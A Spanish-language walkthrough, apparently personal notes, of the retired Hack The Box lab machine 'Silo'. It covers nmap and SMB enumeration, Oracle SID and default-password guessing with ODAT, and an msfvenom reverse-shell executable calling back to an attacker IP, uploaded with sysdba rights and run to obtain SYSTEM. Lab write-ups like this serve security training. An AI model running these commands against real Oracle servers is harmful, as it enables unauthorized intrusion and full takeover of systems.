Volver atras HTB_Silo | Savinotes

HTB_Silo

Silo {-}

Introduccion {-}

La maquina del dia 11/08/2021 se llama Silo .

El replay del live se puede ver aqui

S4vitaar Silo maquina

No olvideis dejar un like al video y un commentario…

Enumeracion {-}

Reconocimiento de maquina, puertos abiertos y servicios {-}

Ping {-}

ping -c 1 10.10.10.82

ttl: 127 -> maquina Windows

Nmap {-}

nmap -p- --open -T5 -v -n 10.10.10.82

Va lento

nmap -sS -p- --open --min-rate 5000 -vvv -n -Pn 10.10.10.82 -oG allPorts 
extractPorts allPorts
nmap -sC -sV -p80,135,139,445,1521,5985,47001,49152,49153,49154,49155,49159,49160,49161,49162 10.10.10.82 -oN targeted
PuertoServicioQue se nos occure?Que falta?
80httpWeb, fuzzing
135msrpc
139netbios
445smbNull session
1521oracle-tnsAttacke con ODAT
5985msrpcPuertos por defecto de windows
47001msrpcPuertos por defecto de windows
49152msrpcPuertos por defecto de windows
49153msrpcPuertos por defecto de windows
49154msrpcPuertos por defecto de windows
49155msrpcPuertos por defecto de windows
49159msrpcPuertos por defecto de windows
49160msrpcPuertos por defecto de windows
49161msrpcPuertos por defecto de windows
49162msrpcPuertos por defecto de windows

Analyzando el SMB {-}

crackmapexec smb 10.10.10.82
smbclient -L 10.10.10.82 -N

Vemos que estamos en frente de una maquina Windows Server 2021 R2 de 64 bit pro que se llama SILO en el dominio SILO y poco mas

Analyzando la web {-}

Whatweb {-}

whatweb http://10.10.10.82

Nada muy interressante aqui

Checkear la web {-}

Sabemos que es un IIS 8.5 y asp.net pero poco mas. Vamos a fuzzear routas.

Vulnerability Assessment {-}

Oracle ataque con ODAT {-}

Installacion de ODAT {-}

git clone https://github.com/quentinhardy/odat
cd odat
git submodule init
git submodule update
sudo apt-get install libaio1 python3-dev alien python3-pip
pip3 install cx_Oracle

Como la maquina victima es de 64 bits, descargamos los client basic sdk y sqlplus de la web de oracle

mkdir isolation
cd isolation
wget https://download.oracle.com/otn_software/linux/instantclient/211000/oracle-instantclient-basic-21.1.0.0.0-1.x86_64.rpm
wget https://download.oracle.com/otn_software/linux/instantclient/211000/oracle-instantclient-sqlplus-21.1.0.0.0-1.x86_64.rpm
wget https://download.oracle.com/otn_software/linux/instantclient/211000/oracle-instantclient-devel-21.1.0.0.0-1.x86_64.rpm

ahora transformamos los

 .rpm 

en

 .deb 

y lo installamos

alien --to-deb *.rpm
dpkg -i *.deb

Añadimos las variables de entorno el la .zshrc

ls /usr/lib/oracle

#Output
21

vi ~/.zshrc

export ORACLE_HOME=/usr/lib/oracle/21/client64/
export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:$ORACLE_HOME/lib
export PATH=${ORACLE_HOME}bin:$PATH

Checkeamos que todo se aya installado bien

sqlplus64
python3 odat.py --help

Ataque con ODAT {-}

  1. Buscamos si encontramos SID’s

    python3 odat.py sidguesser -s 10.10.10.82
  2. Ataque de typo password guesser

    locate oracle_ | grep "pass"
    cat /usr/share/metasploit-framework/data/wordlists/oracle_default_userpass.txt | tr ' ' '/' | > passwords
    python3 odat.py passwordguesser -s 10.10.10.82 -d XE --accounts-file passwords
  3. Ahora que tenemos un usuario y una contraseña utilizamos el parametro utlfile que permite descargar, uploadear y supprimir ficheros

    msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.8 LPORT=443 -f exe -o shell.exe
    python3 odat.py utlfile -s 10.10.10.82 -d XE -U "scott" -P "tiger"
    python3 odat.py utlfile -s 10.10.10.82 -d XE -U "scott" -P "tiger" --putFile /Temp shell.exe
    python3 odat.py utlfile -s 10.10.10.82 -d XE -U "scott" -P "tiger" --putFile /Temp shell.exe
  4. No tenemos sufficientes privilegios para subir archivos pero ODAT tiene un parametro

 --sysdba 

que nos puede ayudar

```bash
python3 odat.py utlfile -s 10.10.10.82 -d XE -U "scott" -P "tiger" --putFile /Temp shell.exe --sysdba
```
  1. Intentamos ganar accesso al systema

Vuln exploit & Gaining Access {-}

Ganando accesso con ODAT {-}

Nos ponemos en escucha por el puerto 443

rlwrap nc -nlvp 443

Intentamos ejecutar el exploit con odat

python3 odat.py --help
python3 odat.py externaltable -s 10.10.10.82 -d XE -U "scott" -P "tiger" --sysdba --exec /Temp shell.exe

Ya hemos ganado accesso al systema y ademas somos nt authority\system que significa que no es necessario hacer escalada de privilegios.